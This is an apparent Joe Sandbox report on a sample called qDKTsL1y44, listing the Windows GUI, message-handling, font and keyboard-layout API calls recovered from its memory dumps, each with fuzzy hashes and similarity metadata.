
                                                                                                                                  APIs
                                                                                                                                  • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 04235F2F
                                                                                                                                  • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 04235FD0
                                                                                                                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0423601D
                                                                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 04236025
                                                                                                                                  • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0423604A
                                                                                                                                    • Part of subcall function 04235EA8: ImageList_GetBkColor.COMCTL32(00000000,?,04235F09,00000000,?), ref: 04235EBE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorImageList_$Draw$Text
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2027629008-0
                                                                                                                                  • Opcode ID: bb41f6a5d9bcc7fe8a7bcdf46372e8994c48839118a9efa8b7174e22ca0a4c7a
                                                                                                                                  • Instruction ID: a97b65538c9d54f5ddc16f01e85b85db6dadcbec6abba5261045bdc46609c41e
                                                                                                                                  • Opcode Fuzzy Hash: bb41f6a5d9bcc7fe8a7bcdf46372e8994c48839118a9efa8b7174e22ca0a4c7a
                                                                                                                                  • Instruction Fuzzy Hash: E15104B1710205AFEB50EF68CD81FAE77E9AF08714F504161BA04EB2C6CA74FC818B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCapture.USER32 ref: 04230715
                                                                                                                                  • GetCapture.USER32 ref: 04230724
                                                                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0423072A
                                                                                                                                  • ReleaseCapture.USER32 ref: 0423072F
                                                                                                                                  • GetActiveWindow.USER32 ref: 04230780
                                                                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04230816
                                                                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04230883
                                                                                                                                  • GetActiveWindow.USER32 ref: 04230892
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 862346643-0
                                                                                                                                  • Opcode ID: 2f34bf1480649e28ec00e89b3edd20067b8bcce75f191fad7d41b890f21f0a80
                                                                                                                                  • Instruction ID: dcba37d4f9c87031b180bae4c63f5574ba1f28438125358727c98a9b3b4a1a67
                                                                                                                                  • Opcode Fuzzy Hash: 2f34bf1480649e28ec00e89b3edd20067b8bcce75f191fad7d41b890f21f0a80
                                                                                                                                  • Instruction Fuzzy Hash: 345146B4B10684AFEB01EFA9C985BAD7BF2EF45709F5540A0E400AB265D778BE40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SaveDC.GDI32(?), ref: 0421FD79
                                                                                                                                    • Part of subcall function 04218B74: GetWindowOrgEx.GDI32(00000000), ref: 04218B82
                                                                                                                                    • Part of subcall function 04218B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 04218B98
                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0421FDB2
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0421FDC6
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0421FDE7
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 0421FE17
                                                                                                                                  • DrawEdge.USER32(?,?,00000000,00000000), ref: 0421FE26
                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0421FE4F
                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 0421FECE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2976466617-0
                                                                                                                                  • Opcode ID: 6c56df06b27f2583b834b9f899bdec3a56236d737596b226553d088fbb263a8f
                                                                                                                                  • Instruction ID: 41449d9bf96a623256bd2d0b76cab5fee7721e73e3b117d9542c8740f0c319cd
                                                                                                                                  • Opcode Fuzzy Hash: 6c56df06b27f2583b834b9f899bdec3a56236d737596b226553d088fbb263a8f
                                                                                                                                  • Instruction Fuzzy Hash: 31410A75B10609AFEB10DA98C9C1FAEB7F9EB58304F1141A0F614EB2A1C775BE41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCapture.USER32 ref: 04233BE2
                                                                                                                                  • IsWindowUnicode.USER32(00000000), ref: 04233C25
                                                                                                                                  • SendMessageW.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C40
                                                                                                                                  • SendMessageA.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C5F
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 04233C6E
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 04233C7C
                                                                                                                                  • SendMessageA.USER32(00000000,-0000BBEE,029F67A0,?), ref: 04233C9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1994056952-0
                                                                                                                                  • Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                                                  • Instruction ID: 39cbf33ad7c1e9ceab3490829c3e88012e217a01956cae4e50f011492b085252
                                                                                                                                  • Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                                                  • Instruction Fuzzy Hash: 1021A3B532460A6FE760FAA9CD80F67B3ECEF44A15B144C24FD69C3641D711F9208720
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 04203A76
                                                                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 04203A92
                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04203AB1
                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 04203AD5
                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 04203AF3
                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 04203B07
                                                                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 04203B27
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 04203B3F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1781840570-0
                                                                                                                                  • Opcode ID: 57a3148656119fe1da27c9ee08a383b4796e4f562756e8997d1c2ddfcc9a8337
                                                                                                                                  • Instruction ID: 517bea6716cc6c9cb8fa33b0f853024347b0e75c8abaf28df7115366dbba2ec1
                                                                                                                                  • Opcode Fuzzy Hash: 57a3148656119fe1da27c9ee08a383b4796e4f562756e8997d1c2ddfcc9a8337
                                                                                                                                  • Instruction Fuzzy Hash: 30214FB5A40608BFEB10DBA5CD85FAEB3BCEB08708F904591BB44E61C0D775BE408B25
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0420FBED), ref: 0420FA38
                                                                                                                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0420FB41
                                                                                                                                    • Part of subcall function 0420FEA0: CreatePopupMenu.USER32 ref: 0420FEBB
                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 0420FBCA
                                                                                                                                    • Part of subcall function 0420FEA0: CreateMenu.USER32 ref: 0420FEC5
                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0420FBB1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                  • String ID: ,$?
                                                                                                                                  • API String ID: 2359071979-2308483597
                                                                                                                                  • Opcode ID: 6153df75111270bf0b006fcef49dafb4e58cdff0159f412e5b713cc9db9d58a9
                                                                                                                                  • Instruction ID: 7704f93f081f3bbdae2c57bf37ae85ca8c1646d5446d9cbf8b22abe8ca7e8d8f
                                                                                                                                  • Opcode Fuzzy Hash: 6153df75111270bf0b006fcef49dafb4e58cdff0159f412e5b713cc9db9d58a9
                                                                                                                                  • Instruction Fuzzy Hash: 3D612634B242449BEB20EF69D9C066A7BF9EF0A304B4581A5E950E7296D378FD41CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,042238EC), ref: 042237ED
                                                                                                                                  • GetTickCount.KERNEL32 ref: 042237F2
                                                                                                                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 04223836
                                                                                                                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0422384E
                                                                                                                                  • AnimateWindow.USER32(00000000,00000064,?), ref: 04223893
                                                                                                                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,042238EC), ref: 042238B6
                                                                                                                                    • Part of subcall function 04226EC8: GetCursorPos.USER32(?), ref: 04226ECC
                                                                                                                                  • GetTickCount.KERNEL32 ref: 042238D3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3024527889-0
                                                                                                                                  • Opcode ID: 37eb72ade3fc119b51de1ef4f780528d2b525a61f2a29450dc24d43aaf39ba16
                                                                                                                                  • Instruction ID: 20cfce6728aa40ad320a36f1b5c1c34c0ec22fe6dea45579f7cbaca2b03c41a3
                                                                                                                                  • Opcode Fuzzy Hash: 37eb72ade3fc119b51de1ef4f780528d2b525a61f2a29450dc24d43aaf39ba16
                                                                                                                                  • Instruction Fuzzy Hash: 05511678B10205EFEB10DFA8CA85AAEB7F5EF49304F2445A0E900EB254D774BE41DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 042354A8: GetActiveWindow.USER32 ref: 042354CF
                                                                                                                                    • Part of subcall function 042354A8: GetLastActivePopup.USER32(?), ref: 042354E1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0423417E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 042341B6
                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,?), ref: 042341F5
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0423426B), ref: 04234245
                                                                                                                                  • SetActiveWindow.USER32(00000000,0423426B), ref: 04234256
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Active$LastMessagePopupRect
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 3456420849-3887548279
                                                                                                                                  • Opcode ID: 3689cd5adc925f3079d9f282cd70ef5089ffc5460462c658c3bdef92b89ddb3e
                                                                                                                                  • Instruction ID: 018df38b17a2f7c361f8cdb0a0e39a54b4b970164adb7a3852370e9ff3a5a0ff
                                                                                                                                  • Opcode Fuzzy Hash: 3689cd5adc925f3079d9f282cd70ef5089ffc5460462c658c3bdef92b89ddb3e
                                                                                                                                  • Instruction Fuzzy Hash: 4E51F8B5B10619AFEB04EFA8DD81FAEB7B8FB48705F144495E500EB391D674BD008B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,04231B83,?,029FD9D0,?,04231BE5,00000000,?,0421D22F), ref: 04231A2E
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 04231A96
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,04231B3F,?,80000002,00000000), ref: 04231AD0
                                                                                                                                  • RegCloseKey.ADVAPI32(?,04231B46,00000000,?,00000100,00000000,04231B3F,?,80000002,00000000), ref: 04231B39
                                                                                                                                  Strings
                                                                                                                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 04231A80
                                                                                                                                  • layout text, xrefs: 04231AC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                  • API String ID: 1703357764-2652665750
                                                                                                                                  • Opcode ID: 6fa178af82021582a4a451db4550715d3b17759a3b40b2e13422b929fa0ccaab
                                                                                                                                  • Instruction ID: a9042198bb65c7a3867d9fd37a4dd093e3cd305964958480e952a969fb7ba80c
                                                                                                                                  • Opcode Fuzzy Hash: 6fa178af82021582a4a451db4550715d3b17759a3b40b2e13422b929fa0ccaab
                                                                                                                                  • Instruction Fuzzy Hash: 744145B8A10609AFEB10DF95C981BAEB7F9EB48704F9140E1E904A7251E770BE54CF61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04233E00
                                                                                                                                  • IsWindowUnicode.USER32 ref: 04233E14
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04233E35
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04233E4B
                                                                                                                                  • TranslateMessage.USER32 ref: 04233ED4
                                                                                                                                  • DispatchMessageW.USER32 ref: 04233EE0
                                                                                                                                  • DispatchMessageA.USER32 ref: 04233EE8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2190272339-0
                                                                                                                                  • Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                                                  • Instruction ID: 9a86b6fabeb5db793a1bbc92d176e8f0f38e2e0232c312a8ba640c9e73889254
                                                                                                                                  • Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                                                  • Instruction Fuzzy Hash: C92126B072834167FA31FA294D41BBB93B94F92B4AF144459FD80D71C2D7E6B646C212
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0422D161
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0422D173
                                                                                                                                  • GetClassLongA.USER32(00000000,000000E6), ref: 0422D186
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0422D1C6
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0422D1DA
                                                                                                                                  • SetClassLongA.USER32(00000000,000000E6,?), ref: 0422D1EE
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 0422D20A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Long$Window$Class
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2026531576-0
                                                                                                                                  • Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                  • Instruction ID: 8c5e23ab84da8512c2718ac46fc0aa710d4193ccdddbd105985b160ac8c85c78
                                                                                                                                  • Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                  • Instruction Fuzzy Hash: 8821033432826276FA01A73C8D88ABEB7896F8131CF084744B474E72E1CBB4F851D741
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04231D79
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04231D86
                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 04231D9C
                                                                                                                                    • Part of subcall function 04202518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04202525
                                                                                                                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04231DC5
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04231DD5
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 04231DEE
                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 04231E14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2891467149-0
                                                                                                                                  • Opcode ID: 0e61e40688a7d5621c51d9450e476d0e177e14965555bbdeb200e4a5208831bb
                                                                                                                                  • Instruction ID: 86b3026c700b92ee7831db5ae094bc23f063ae4018e625730cb5641b5bfa39db
                                                                                                                                  • Opcode Fuzzy Hash: 0e61e40688a7d5621c51d9450e476d0e177e14965555bbdeb200e4a5208831bb
                                                                                                                                  • Instruction Fuzzy Hash: 0F31CF707556459BFB54EB68DD89BA933F8EB44305F8480F1A948CB286DF78BC05CB20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041EC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,041EC9F2), ref: 041EC95E
                                                                                                                                    • Part of subcall function 041EC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,041EC9D5,?,00000000,?,00000000,041EC9F2), ref: 041EC993
                                                                                                                                    • Part of subcall function 041EC91C: VerQueryValueA.VERSION(?,041ECA04,?,?,00000000,?,00000000,?,00000000,041EC9D5,?,00000000,?,00000000,041EC9F2), ref: 041EC9AD
                                                                                                                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04236CA4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04236CB5
                                                                                                                                  • ImageList_Write.COMCTL32(00000000,?,00000000,04236D6A), ref: 04236D34
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                                                                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                  • API String ID: 4063495462-3125200627
                                                                                                                                  • Opcode ID: 274c631e4b578dfafa2cd9944565233d7b67322c74337dd2e60513f9f4aac90d
                                                                                                                                  • Instruction ID: c90cba8ffba1ab71cedaba95e77c2abf8d0292da891e90dc81b0de643c58be00
                                                                                                                                  • Opcode Fuzzy Hash: 274c631e4b578dfafa2cd9944565233d7b67322c74337dd2e60513f9f4aac90d
                                                                                                                                  • Instruction Fuzzy Hash: 7B2174B4320745BBE720AF7AEC88B2D77BDEB4471AB400464F905D7251DB76BC40DA20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayoutNameA.USER32(00000000), ref: 04213030
                                                                                                                                    • Part of subcall function 042002A4: RegCloseKey.ADVAPI32(10940000,04200180,00000001,04200222,?,?,042076BA,00000008,00000060,00000048,00000000,0420775F), ref: 042002B8
                                                                                                                                    • Part of subcall function 04200308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374
                                                                                                                                    • Part of subcall function 041EDC04: SetErrorMode.KERNEL32 ref: 041EDC0E
                                                                                                                                    • Part of subcall function 041EDC04: LoadLibraryA.KERNEL32(00000000,00000000,041EDC58,?,00000000,041EDC76), ref: 041EDC3D
                                                                                                                                  • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 042130C1
                                                                                                                                  • FreeLibrary.KERNEL32(?,042130FB,?,00000000,0421313B), ref: 042130EE
